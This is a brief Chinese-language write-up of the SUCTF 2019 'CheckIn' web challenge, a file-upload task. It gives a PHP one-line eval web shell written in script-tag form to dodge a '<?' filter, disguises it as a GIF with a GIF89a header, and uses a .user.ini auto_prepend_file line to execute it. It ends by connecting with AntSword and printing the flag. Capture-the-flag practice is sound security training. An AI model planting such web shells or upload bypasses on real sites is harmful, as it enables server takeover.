[SUCTF 2019]CheckIn

点击启动靶机。

源码：https://github.com/team-su/SUCTF-2019/tree/master/Web/checkIn

 

进入后发现还是文件上传，尝试上传一句话木马，提示扩展名错误

修改扩展名为jpg，上传提示文件中不允许出现“<?”，知道文件中进行了黑名单检测

更改写法为<script language='php'>@eval($_POST['cmd']);</script>

上传提示“exif_imagetype:not image!”，在文件最开始前加上文件头GIF89a，终于将图片马上传成功

成功后上传.user.ini（也需要图片文件头）：auto_prepend_file=a.jpg，这样就可以自动调用a.jpg

之后蚁剑连接，得到flag

flag{778a79c8-ac6f-47e1-8f24-4d393e6d3e19}